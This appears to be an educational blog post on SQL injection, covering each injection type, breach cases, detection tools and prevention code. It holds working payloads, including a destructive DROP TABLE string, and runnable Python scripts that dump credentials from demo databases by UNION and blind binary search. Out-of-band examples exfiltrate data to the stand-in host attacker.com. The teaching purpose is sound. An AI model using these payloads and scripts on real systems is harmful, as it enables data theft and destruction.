SQL Injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It can be used to:
- View data they shouldn’t be able to access
- Modify or delete records
- Execute administrative operations
- Bypass authentication
- In some cases, gain full control over the system
Injection, of which SQLi is the most common form, is still in the OWASP Top 10 Web Application Security Risks (A03:2021 Injection).
🧪 How SQL Injection Works
Applications often take user input (like login fields, search bars, or form entries) and insert it directly into SQL queries. When input isn’t sanitized or validated properly, malicious SQL can manipulate the query.
🧾 Vulnerable Query Example:
SELECT * FROM users WHERE username = 'admin' AND password = '1234';
🔥 Injection Payload (typed into the username field, password left empty):
' OR '1'='1
➡️ Final Query:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
Note the operator precedence: AND binds tighter than OR, so the database reads this as username = '' OR ('1'='1' AND password = ''), which only matches an account whose password is empty. The bypass works when the payload goes into the password field instead (... AND password = '' OR '1'='1' is true for every row) or when the attacker comments out the rest of the query from the username field: ' OR '1'='1' --
Result: The WHERE clause is true for every row, the application takes the first one, and the attacker is logged in as that user (often admin) with no password.
🧰 Types of SQL Injection
Type | Description |
---|---|
Classic (in-band) SQLi | Injection and data retrieval over the same channel, the application's normal response |
Error-based SQLi | Uses verbose database error messages to leak schema or data |
Union-based SQLi | Appends a UNION SELECT so rows from other tables appear in the normal result set |
Blind SQLi | No data or errors in the response; the attacker infers results from application behaviour |
Boolean-based Blind | Injects TRUE/FALSE conditions and watches which page comes back |
Time-based Blind | Injects SLEEP()-style delays and measures response time |
Out-of-Band SQLi | Makes the database itself call out over DNS or HTTP to an attacker-controlled host, carrying data in the request |
1️⃣ Classic SQL Injection (In-Band SQLi)
Most straightforward and visible form where the attacker uses the same communication channel to both inject and retrieve data.
Example Input:
' OR '1'='1
Resulting Query:
SELECT * FROM users WHERE username = '' OR '1'='1';
Result: Authenticates the attacker without a password.
Real-World Use: Often used in login bypasses, especially in legacy PHP applications.
2️⃣ Error-Based SQL Injection
Uses detailed database error messages to retrieve information like table names, column names, and even data.
Payload Example (Microsoft SQL Server):
' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'))--
How It Works: CONVERT fails to cast the table name to an integer, and SQL Server's error message quotes the value it could not convert, so one user table name (xtype='U') leaks per request; adding a WHERE name NOT IN ('already_seen') filter to the subquery walks through the rest.
Risks: If verbose error messages reach the user in production, this exposes the full database schema, and with the same cast trick applied to other subqueries, the data as well.
3️⃣ Union-Based SQL Injection
Leverages the UNION SQL operator to append the results of an attacker-chosen SELECT to the results of the original query.
Payload Example:
' UNION SELECT username, password FROM users--
How It Works: The injected SELECT runs alongside the original one and its rows (here usernames and passwords) are rendered wherever the application normally shows the original results. The injected SELECT must return the same number of columns as the original, with compatible types, so attackers first find the column count with ORDER BY n or UNION SELECT NULL, NULL, ... probes and pad unused positions with NULL.
Used for: Extracting full database contents directly into the web page, usually starting with the schema from information_schema (or sqlite_master on SQLite).
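The column-count probe and the schema-then-data dump described above, worked end to end against a constructed in-memory SQLite database. This is an added example, not code from the original post; the products/users tables, the zzz no-match term, and the helper names are assumptions for the demo. The vulnerable endpoint swallows database errors, so the attacker sees only "rows" or "no rows/error", which is exactly the signal the NULL probe relies on.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema for this example: a public products table and a
    users table that the search page was never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products (name, price) VALUES ('laptop', 999.0), ('mouse', 19.5);
        INSERT INTO users (username, password)
            VALUES ('admin', 'S3cret!'), ('alice', 'hunter2');
    """)
    return conn


def search_vulnerable(conn, term):
    """The vulnerable search endpoint: the term is concatenated into the LIKE pattern.
    Database errors are swallowed (returns None), as a production app with a generic
    error page would; the attacker only sees 'results' or 'no results / error'."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


# ---- attacker side ----------------------------------------------------------
# A search term that matches no product, so every row that comes back was added
# by the injected SELECT.
NO_MATCH = "zzz"


def make_search(conn):
    """Stand-in for the HTTP request the attacker would send to the search page."""
    def search(term):
        return search_vulnerable(conn, term)
    return search


def find_column_count(search, max_cols=10):
    """UNION only parses when both SELECTs have the same number of columns, so probe
    with a growing list of NULLs (NULL is compatible with every column type)."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        if search(f"{NO_MATCH}' UNION SELECT {nulls}-- ") is not None:
            return n
    return None


def union_dump(search, ncols, select_expr, from_clause):
    """Put the attacker's expression in the first column and pad the rest with NULL
    so the injected SELECT lines up with the original one."""
    cols = ", ".join([select_expr] + ["NULL"] * (ncols - 1))
    rows = search(f"{NO_MATCH}' UNION SELECT {cols} FROM {from_clause}-- ")
    return sorted(row[0] for row in rows)


def list_tables(search, ncols):
    """SQLite keeps its schema in sqlite_master; MySQL, PostgreSQL and SQL Server
    expose the same through information_schema.tables."""
    return union_dump(search, ncols, "name", "sqlite_master WHERE type = 'table'")


def dump_credentials(search, ncols):
    """Concatenate two columns into one string so this works even when the page
    renders only a single column."""
    return union_dump(search, ncols, "username || ':' || password", "users")


def run_attack(conn):
    search = make_search(conn)
    ncols = find_column_count(search)
    return {
        "columns": ncols,                                  # 2
        "tables": list_tables(search, ncols),              # ['products', 'users']
        "credentials": dump_credentials(search, ncols),    # ['admin:S3cret!', 'alice:hunter2']
    }


if __name__ == "__main__":
    print(run_attack(make_db()))
```

On MySQL or PostgreSQL the only changes are the schema source (information_schema.tables / information_schema.columns) and the concatenation operator (CONCAT() on MySQL); the probing logic is the same.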
4️⃣ Blind SQL Injection (Boolean-Based)
When an application shows neither data nor errors, attackers inject a condition and infer whether it was true from how the application behaves.
Payload Example:
' AND 1=1-- (returns the normal page)
' AND 1=2-- (returns an empty or different page)
How It Works: The difference between the two responses (a record shown or not, a different message) tells the attacker whether the injected condition was true. Replacing 1=1 with a condition on the data, such as SUBSTRING(password,1,1)='a', extracts it one comparison at a time; a binary search over the character range brings this down to about seven requests per character.
Slow but powerful: Can still extract entire databases.
5️⃣ Blind SQL Injection (Time-Based)
Used when there’s no output at all—attackers determine success based on delays triggered in the database.
Payload Example (MySQL):
' OR IF(1=1, SLEEP(5), 0)-- -
Observation: A page that takes about five seconds longer to load means the condition was true. (In MySQL the -- comment marker must be followed by whitespace, which is why payloads end in "-- -" or use # instead.)
Common when:
- Responses are uniform (e.g., error pages)
- No visible errors
- Web app is heavily locked down
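The boolean-based inference loop from the previous two sections, worked against a constructed in-memory SQLite database: detect the injection with the 1=1 / 1=2 pair, then binary-search the length and each character of the admin password through a yes/no oracle. This is an added example, not code from the original post; the products/users tables, the laptop anchor value, and the class and function names are assumptions for the demo. It covers the time-based variant only by analogy: SQLite has no SLEEP(), so the oracle here reads the true/false page, and a time-based oracle would wrap the condition in a delay and measure elapsed time while reusing the same extraction loops.

```python
import sqlite3


def make_db():
    """Constructed in-memory data for this example (not a real application's)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products (name) VALUES ('laptop'), ('mouse');
        INSERT INTO users (username, password)
            VALUES ('admin', 'S3cret!'), ('alice', 'hunter2');
    """)
    return conn


def product_exists(conn, name):
    """The vulnerable endpoint. It never shows data or errors: the page only differs
    by whether a product was found (True) or not (False)."""
    sql = f"SELECT id FROM products WHERE name = '{name}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


# ---- attacker side ----------------------------------------------------------
class BooleanOracle:
    """Turns the yes/no page into an oracle for an arbitrary SQL condition by
    injecting it behind a product name that is known to exist. For time-based
    blind SQLi, ask() would instead inject IF(cond, SLEEP(n), 0) and return
    (elapsed >= n); everything built on top of ask() stays the same."""

    def __init__(self, conn, known_name="laptop"):
        self.conn = conn
        self.known_name = known_name
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return product_exists(self.conn, f"{self.known_name}' AND ({condition})-- ")


def is_injectable(oracle):
    """Detection step: the classic 1=1 / 1=2 pair must give different answers."""
    return oracle.ask("1=1") and not oracle.ask("1=2")


def binary_search(oracle, expr, lo, hi):
    """Find the integer value of SQL expression `expr` within [lo, hi] by asking
    'expr > mid' questions; each answer halves the remaining interval."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, subquery, max_len=64):
    """Extract the text returned by `subquery`: first its length, then each
    character's code point (printable ASCII 32..126), one position at a time."""
    length = binary_search(oracle, f"length({subquery})", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        # substr() is 1-based in SQL; unicode() is SQLite's equivalent of ASCII()/ORD().
        code = binary_search(oracle, f"unicode(substr({subquery}, {i}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def steal_admin_password(conn):
    """Returns (password, number of requests used), or None if not injectable."""
    oracle = BooleanOracle(conn)
    if not is_injectable(oracle):
        return None
    secret = extract_string(oracle, "(SELECT password FROM users WHERE username = 'admin')")
    return secret, oracle.requests


if __name__ == "__main__":
    print(steal_admin_password(make_db()))   # ('S3cret!', <well under 100 requests>)
```

Seven printable-ASCII characters cost at most 7 oracle calls each plus 7 for the length, versus several hundred for a linear scan; that request count is also what a defender should look for in the logs, since a blind extraction leaves a long run of near-identical requests differing only in a number.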
6️⃣ Out-of-Band SQL Injection (OOB SQLi)
Used when the app's response shows nothing and delay-based attacks are not practical. It makes the database server itself open a connection to an attacker-controlled host, usually over DNS or HTTP, and carries the data inside that request.
Payload Example (Microsoft SQL Server, data exfil via DNS):
'; EXEC master..xp_dirtree '\\attacker.com\share'--
How It Works: xp_dirtree tries to list a UNC path, which forces the database host to resolve attacker.com (and attempt an SMB connection). Concatenating a query result into the hostname, e.g. \\<value>.attacker.com\share, turns every lookup that arrives at the attacker's nameserver into a leaked value.
Powerful but rare: Requires stacked queries, database functions that reach the network (xp_dirtree on SQL Server, LOAD_FILE with a UNC path on MySQL for Windows, UTL_HTTP.REQUEST or UTL_INADDR on Oracle, etc.), and outbound DNS or HTTP from the database host.
🔎 Comparison Table
Type | Output Visible | Speed | Stealth | Common Use Case |
---|---|---|---|---|
Classic SQLi | ✅ Yes | ⚡ Fast | ❌ No | Login bypass, dump data |
Error-Based SQLi | ✅ Yes (errors) | ⚡ Fast | ❌ No | Schema discovery |
Union-Based SQLi | ✅ Yes | ⚡ Fast | ❌ No | Data extraction into webpage |
Blind Boolean SQLi | ❌ No | 🐢 Slow | ✅ Yes | When errors are hidden |
Time-Based Blind SQLi | ❌ No | 🐢 Very Slow | ✅ High | When no other channel is available |
Out-of-Band SQLi | ❌ No (directly) | 🚀 Fast | ✅ High | DNS/HTTP-based data exfiltration |
🧠 Real-World Exploits
1. Heartland Payment Systems (2008)
Over 134 million credit cards stolen due to SQLi in web applications connected to their payment infrastructure.
2. Yahoo Voices (2012)
Over 450,000 user credentials leaked using a union-based SQLi attack on a subdomain.
3. TalkTalk Telecom (UK) (2015)
Attackers used a simple SQL injection to access customer records, including bank details. The UK Information Commissioner's Office fined TalkTalk £400,000.
🔎 Detection Techniques
🔧 Manual Testing
- Inject test payloads such as:
' OR '1'='1, admin' --, '; DROP TABLE users; --
- Compare each response with the baseline: database error messages, different page content, extra or missing rows, or a longer response time. Pair every probe with its negative (1=1 vs 1=2) so a difference can be attributed to the injection and not to noise.
- The DROP payload is destructive and only runs where stacked queries are supported; on a system you are authorized to test, start with a lone single quote or a delay probe instead.
🧪 Tools for Detection
- sqlmap – automated SQLi testing and exploitation
- Burp Suite – manual testing with payload tampering
- Netsparker (now Invicti) / Acunetix – commercial scanners with SQLi detection
🛡️ Prevention and Mitigation
✅ 1. Use Prepared Statements (Parameterized Queries)
cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password))
Here %s is the database driver's parameter marker (psycopg2, MySQLdb), not Python string formatting: the values travel separately from the SQL text, so a quote inside them can never end the string literal. Never build the query with %, + or f-strings. Comparing a plaintext password in SQL is shown only to mirror the vulnerable query; store a salted hash and compare it in application code.
✅ 2. Input Validation & Escaping
- Allow-list expected values (e.g. a fixed set of sort columns); this is the only defence for identifiers such as table or column names, which cannot be passed as parameters
- Reject unexpected characters or SQL syntax, but treat escaping as a secondary control: it is database-specific and easy to get wrong, and it never replaces parameterized queries
✅ 3. Least Privilege Access
- Database users should not have DROP, DELETE, or ALTER privileges unless needed; run the web application under a dedicated account with only the SELECT/INSERT/UPDATE rights on the tables it uses, so a successful injection cannot read other schemas or reach the file system and network
✅ 4. Web Application Firewall (WAF)
- Tools like ModSecurity (with the OWASP Core Rule Set), Cloudflare, or AWS WAF can block common payloads; treat this as defence in depth, since encoding and comment tricks routinely bypass signature rules
✅ 5. Disable Detailed Errors in Production
- Prevents leaking SQL syntax, table names, or data through error-based SQLi; log the full error server-side and return a generic message to the user
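The hardened counterpart to the vulnerable login and search code, combining items 1 to 3 above: bound parameters for values, an allow-list for the one thing parameters cannot protect (a user-chosen ORDER BY column), LIKE-wildcard escaping so a search term cannot be turned into "match everything", and password hashes compared in application code. This is an added example, not code from the original post; it uses SQLite in memory, and the table layout, the PBKDF2 settings, and the function names are assumptions for the demo.

```python
import hashlib
import hmac
import os
import sqlite3

# Identifiers (table/column names) cannot be bound as parameters, so the only safe
# way to let a user choose a sort column is an allow-list of known names.
ALLOWED_SORT_COLUMNS = {"name", "price"}
# PBKDF2-HMAC-SHA256 iteration count (assumption for the demo; prefer argon2/bcrypt
# where a library is available).
PBKDF2_ITERATIONS = 600_000


def make_db():
    """Constructed in-memory schema for this example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,
                            salt BLOB, pw_hash BLOB);
        INSERT INTO products (name, price) VALUES ('laptop', 999.0), ('mouse', 19.5);
    """)
    return conn


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def create_user(conn, username, password):
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
        (username, salt, hash_password(password, salt)),
    )
    conn.commit()


def verify_login(conn, username, password):
    """Look the user up with a bound parameter and compare the password hash in the
    application, in constant time. Nothing the user typed ever becomes SQL text."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(hash_password(password, salt), stored)


def escape_like(term):
    """Parameters stop injection, but % and _ are still LIKE wildcards inside the
    bound value; escape them so a user cannot widen the search with a bare '%'."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_products(conn, term, sort_by="name", limit=20):
    """Value inputs are bound; the identifier is checked against the allow-list."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    sql = (
        "SELECT name, price FROM products WHERE name LIKE ? ESCAPE '\\' "
        f"ORDER BY {sort_by} LIMIT ?"
    )
    return conn.execute(sql, (f"%{escape_like(term)}%", int(limit))).fetchall()


if __name__ == "__main__":
    conn = make_db()
    create_user(conn, "admin", "S3cret!")
    print(verify_login(conn, "admin", "S3cret!"))            # True
    print(verify_login(conn, "' OR '1'='1' -- ", "x"))       # False
    print(search_products(conn, "' OR '1'='1' -- "))         # []
    print(search_products(conn, "", sort_by="price"))        # mouse first, then laptop
```

The ValueError path is deliberate: a sort column that is not on the allow-list is a bug in the caller or an attack, and either way the request should fail loudly rather than be "sanitized" into something that might still parse.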
🧠 Advanced Exploitation
🔐 Extracting Data (UNION-based SQLi)
' UNION SELECT username, password FROM users --
🕵️ Time-Based Blind SQLi (PostgreSQL)
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END --
This stacked form needs a driver that accepts several statements in one call; where it does not, inline the delay in the original query instead: ' AND 1=(SELECT 1 FROM pg_sleep(5))--
📤 Out-of-Band with DNS Exfiltration (using sqlmap)
sqlmap -u "http://target.com/search?q=test" --dns-domain=attacker.com --dbs
sqlmap must run as root on the host that is the authoritative nameserver for attacker.com, because it listens on UDP/53 itself to collect the lookups the database makes.
🔄 Related HackerVault Posts
- 🔍 Web Security 101: How Websites Get Hacked
- 🧪 Malware Analysis 101: Inside Malicious Code
- 🛡️ Wazuh SIEM: Real-Time Threat Monitoring
🧩 Conclusion
SQL Injection is old, but far from obsolete. Wherever user input is still concatenated into query text and validation is an afterthought, it remains one of the most common and most damaging vulnerabilities in the wild. Understanding SQLi in depth is essential for ethical hackers and defenders alike.